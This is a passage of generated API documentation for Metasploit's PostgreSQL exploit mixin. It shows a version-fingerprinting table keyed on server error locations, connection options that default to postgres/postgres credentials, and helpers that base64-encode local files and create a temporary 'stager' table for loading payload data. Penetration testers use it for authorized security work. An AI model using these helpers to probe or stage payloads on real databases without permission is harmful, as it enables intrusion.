</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L364:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.2</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fmiscinit.c:L432:RInitializeSessionUserId</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.1.5</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L709:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.1.5</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L302:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.1.6</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Bad password, good database
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L718:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.1.6</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Good creds, non-existent but allowed database
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L483:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.1.6</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Bad user
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fmiscinit.c:L362:RInitializeSessionUserId</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.4.1-5</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Bad user
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L285:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.4.1-5</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Bad creds, good database
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L794:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.4.1-5</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Good creds, non-existent but allowed database
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L481:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.4.1-5</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># bad user or host
</span>
<span class='comment'># Windows
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>F.\src\backend\libpq\auth.c:L273:Rauth_failed</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.2-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>F.\src\backend\utils\init\postinit.c:L422:RInitPostgres</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.2-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>F.\src\backend\libpq\auth.c:L359:RClientAuthentication</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.2-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>F.\src\backend\libpq\auth.c:L464:RClientAuthentication</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.0.3-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (not allowed in pg_hba.conf)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>F.\src\backend\libpq\auth.c:L297:Rauth_failed</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.0.3-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (bad db or bad creds)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Fsrc\backend\libpq\auth.c:L302:Rauth_failed</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.2.1-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (bad db or bad creds)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.2.1-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Fsrc\backend\libpq\auth.c:L479:RClientAuthentication</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>9.2.1-Win</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (not allowed in pg_hba.conf)
</span>
<span class='comment'># OpenSolaris (thanks Alexander!)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Fmiscinit.c:L420:</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>8.2.6-8.2.13-OpenSolaris</span><span class='tstring_end'>&#39;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (good db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Fmiscinit.c:L382:</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>8.2.4-OpenSolaris</span><span class='tstring_end'>&#39;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (good db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Fpostinit.c:L318:</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>8.2.4-8.2.9-OpenSolaris</span><span class='tstring_end'>&#39;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Fpostinit.c:L319:</span><span class='tstring_end'>&#39;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>8.2.10-8.2.13-OpenSolaris</span><span class='tstring_end'>&#39;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span>
<span class='kw'>else</span>
<span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:unknown</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_fingerprint'>fingerprint</span><span class='rbrace'>}</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="database-instance_method">
#<strong>database</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Return the datastore value of the same name</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Database to connect to when authenticating</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
62</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 62</span>
<span class='kw'>def</span> <span class='id identifier rubyid_database'>database</span><span class='semicolon'>;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATABASE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='semicolon'>;</span> <span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Creates an instance of a PostgreSQL exploit module.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 26</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span>
<span class='comment'># Register the options that all Postgres exploits may make use of.
</span> <span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../Opt.html" title="Msf::Opt (module)">Opt</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Opt.html#RHOST-constant" title="Msf::Opt::RHOST (constant)">RHOST</a></span></span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../Opt.html" title="Msf::Opt (module)">Opt</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Opt.html#RPORT-constant" title="Msf::Opt::RPORT (constant)">RPORT</a></span></span><span class='lparen'>(</span><span class='int'>5432</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATABASE</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The database to authenticate against</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>template1</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>USERNAME</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The username to authenticate as</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>postgres</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PASSWORD</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The password for the specified username. Leave blank for a random password.</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>postgres</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Enable verbose output</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SQL</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The SQL query to execute</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>select version()</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RETURN_ROWSET</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Set to true to see query result sets</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>true</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::Postgres (module)">Postgres</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_autofilter_ports'>register_autofilter_ports</span><span class='lparen'>(</span><span class='lbracket'>[</span> <span class='int'>5432</span> <span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_autofilter_services'>register_autofilter_services</span><span class='lparen'>(</span><span class='words_beg'>%W{</span><span class='words_sep'> </span><span class='tstring_content'>postgres</span><span class='words_sep'> </span><span class='tstring_end'>}</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="password-instance_method">
#<strong>password</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Return the datastore value of the same name</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Password for authentication</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
59</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 59</span>
<span class='kw'>def</span> <span class='id identifier rubyid_password'>password</span><span class='semicolon'>;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PASSWORD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='semicolon'>;</span> <span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_authed_fingerprint-instance_method">
#<strong>postgres_authed_fingerprint</strong> &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Ask the server what its version is</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash containing the version in one of the keys :preauth, :auth, or :unknown, depending on how it was determined</p>
</div>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#postgres_fingerprint-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_fingerprint (method)">#postgres_fingerprint</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
251
252
253
254
255</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 251</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_authed_fingerprint'>postgres_authed_fingerprint</span>
<span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select version()</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ver'>ver</span> <span class='op'>=</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:complete</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:auth</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_ver'>ver</span><span class='rbrace'>}</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_base64_data-instance_method">
#<strong>postgres_base64_data</strong>(data) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Converts data to base64 with no newlines</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>data</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Raw data to be base64'd</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>A base64 string suitable for passing to postgresql's decode(..., 'base64') function</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
496
497
498</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 496</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_base64_data'>postgres_base64_data</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='lbracket'>[</span><span class='id identifier rubyid_data'>data</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>m*</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\r?\n</span><span class='regexp_end'>/</span></span><span class='comma'>,</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_base64_file-instance_method">
#<strong>postgres_base64_file</strong>(fname) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Calls <span class='object_link'><a href="#postgres_base64_data-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_base64_data (method)">#postgres_base64_data</a></span> with the contents of file <code>fname</code></p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>fname</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Name of a file on the local system</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>A base64 string suitable for passing to postgresql's decode(..., 'base64') function</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
486
487
488
489</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 486</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_base64_file'>postgres_base64_file</span><span class='lparen'>(</span><span class='id identifier rubyid_fname'>fname</span><span class='rparen'>)</span>
<span class='id identifier rubyid_data'>data</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_open'>open</span><span class='lparen'>(</span><span class='id identifier rubyid_fname'>fname</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>rb</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_f'>f</span><span class='op'>|</span> <span class='id identifier rubyid_f'>f</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span> <span class='id identifier rubyid_f'>f</span><span class='period'>.</span><span class='id identifier rubyid_stat'>stat</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span><span class='rbrace'>}</span>
<span class='id identifier rubyid_postgres_base64_data'>postgres_base64_data</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_create_stager_table-instance_method">
#<strong>postgres_create_stager_table</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<div class="note deprecated"><strong>Deprecated.</strong> <div class='inline'>
<p>No longer necessary since we can insert base64 data directly</p>
</div></div>
<p>Creates a temporary table to store base64ed binary data in.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
504
505
506
507
508
509
510
511
512
513</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 504</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_create_stager_table'>postgres_create_stager_table</span>
<span class='id identifier rubyid_tbl'>tbl</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span>
<span class='id identifier rubyid_fld'>fld</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span>
<span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>create temporary table </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tbl'>tbl</span><span class='embexpr_end'>}</span><span class='tstring_content'>(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fld'>fld</span><span class='embexpr_end'>}</span><span class='tstring_content'> text)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
